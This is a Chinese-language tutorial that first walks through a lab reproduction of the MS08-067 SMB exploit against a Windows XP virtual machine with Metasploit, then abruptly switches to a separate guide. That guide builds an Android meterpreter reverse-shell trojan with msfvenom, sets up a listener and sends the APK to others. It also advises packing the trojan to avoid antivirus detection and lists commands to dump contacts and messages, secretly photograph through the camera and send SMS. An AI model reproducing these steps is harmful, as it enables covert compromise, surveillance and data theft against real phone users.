ms08-067 复现，使用metasploit

时间：2022-03-10

一、环境准备

1、需要准备英文的windows xp 环境。

链接： https://pan.baidu.com/s/1iN6hxbAlRHCaxPXaBiB4_g

提取码：y8mj

2、攻击工具使用的是metasploit，kali 自带。

二、复现时存在的问题

1、安装完xp之后，我自己已经复现了一次，发现拿到的system没有相关命令，可能是这个新系统没有添加到环境中，之后建立了一个文档进行读取，也可直观的看到结果。其他就没遇到什么问题了。

三、复现演示

1、虚拟机准备一下xp，建立一个test的文档，查看一下靶机 IP，靶机建立完成

2、使用metasploit 进行攻击

1）、msfconsole #进入metasploit

2）、search ms08-067 #搜索相关exp

3）、use exploit/windows/smb/ms08_067_netapi #使用这个exp

4）、show payloads #搜索相关payload，能让攻击后建立连接

5）、set payload generic/shell_bind_tcp #我使用的是这个

6）、set RHOST 192.168.154.144 #设置靶机IP，让它攻击这个IP，端口默认是445，这个就不需要设置了

7）、show options #可以用这个命令查看是否把相关配置设置全了

8）、run 或 exploit #进行攻击，两个命令都可以

9）、type test.txt #之后攻击成功了，使用windows命令 就可以去相关路径下查看那个 test 文档了

演示图：

众所周知，msf是大家公认的神器！

现在我就来说说到底怎么用msf呢

有很多人说，他们不会安装msfconsole

教程：

http://bbs.huluxia.com/wap/thread/829605.html?para=37Hftt%2B137bfsd%2B037Xfst%2B03p%2FfuN%2By37nftt%2Bw37U%3D%0A&product=tool

安装了msfconsole之后，在termux输入：

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 R >/sdcard/mu.apk

其中

LHOST= 后面的数字是本地的ip，不是被攻击者的ip而是你自己的

LPORT= 是端口，高端口不容易被报毒，如果你不知道端口是什么那就不要改了

生成的木马在根目录的mu.apk（啰嗦）

那么接下来，我来教大家怎么监听吧

1.启动msfconsole（漫长）：msfconsole

2.使用multi模块：use exploit/multi/handler

3.设置LHOST（跟木马的一样）：set LHOST 192.168.2.117

4.设置LPORT（一样的）：set LPORT 5555

5.设置payload：set payload android/meterpreter/reverse_tcp

6.启动监听：exploit

最后将木马发给别人就行啦

很多人说一看就知道是木马了！

在这里我说一句，你不会加个壳嘛？

ok！当鱼上吊的时候，会反dshell

命令：

dump_contacts 导出电话

dump_sms 导出信息

webcam_list 列出摄像头

webcam_stream 开启摄像

webcam_snap 偷拍一张照片

webcam_chat 视频通话

ps 列出所有进程

activity_start 启动其它应用

check_root 检查是否root

send_sms 发送指定信息

全部手机进行，免root进行

---